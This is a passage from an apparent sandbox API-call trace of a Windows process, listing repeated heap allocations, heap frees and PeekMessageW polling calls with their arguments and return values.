lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe050 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b78 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe078 [0257.605] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0257.605] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe078 | out: hHeap=0xbc0000) returned 1 [0257.605] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe078 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b78 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe190 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda600 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.605] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcd9dd8 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe280 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ac0 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01968 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d00 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbfb0d8 [0257.605] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe258 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9da8 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01958 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9dc0 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe1b8 [0257.605] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda708 [0257.606] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01928 [0257.606] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda660 [0257.606] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda678 [0257.606] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b88 [0257.606] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda678 | out: hHeap=0xbc0000) returned 1 [0257.606] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda678 [0257.606] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b88 | out: hHeap=0xbc0000) returned 1 [0257.606] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe1e0 [0257.606] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.606] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b88 [0257.606] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6d8 [0257.606] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b80 [0257.606] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe230 [0257.606] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.606] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01988 [0257.606] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.606] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.606] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe208 [0257.606] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b08 [0257.606] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01978 [0257.606] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b20 [0257.607] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d78 [0257.607] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.607] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.607] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.607] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.607] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b80 | out: hHeap=0xbc0000) returned 1 [0257.607] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.607] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.607] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b80 [0257.607] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.607] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.607] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01878 [0257.607] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.607] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.607] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.607] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b80 | out: hHeap=0xbc0000) returned 1 [0257.607] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.607] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.607] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d5e0 [0257.607] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.607] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.607] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.607] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b80 [0257.607] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.608] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.608] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.608] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.608] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.608] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.608] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.608] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.608] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018c8 [0257.608] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.608] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.608] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019c8 [0257.608] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.608] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.608] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b80 | out: hHeap=0xbc0000) returned 1 [0257.608] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9d60 | out: hHeap=0xbc0000) returned 1 [0257.608] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.608] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.608] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.608] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.608] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.608] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01878 [0257.608] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.608] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.608] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.608] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.608] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.608] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.608] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.608] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.608] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d620 [0257.608] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.608] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.608] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.608] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.608] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.608] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.609] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01998 [0257.609] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.609] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.609] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.609] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.609] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.609] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.609] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.609] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.609] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.609] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.609] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.609] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.609] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc019a8 [0257.609] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018c8 [0257.609] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.609] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.609] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.609] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.609] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.609] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.609] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.609] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.609] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.609] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.609] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019b8 [0257.609] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.609] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.609] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.609] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.609] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.609] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.609] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.609] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.610] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.610] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0257.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.610] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.611] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.611] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0257.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.611] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.612] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.612] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.612] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.612] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.612] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.612] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.612] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01878 [0257.612] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01878 | out: hHeap=0xbc0000) returned 1 [0257.612] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.612] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.612] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.612] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0257.612] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9b50 | out: hHeap=0xbc0000) returned 1 [0257.612] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.612] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.612] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 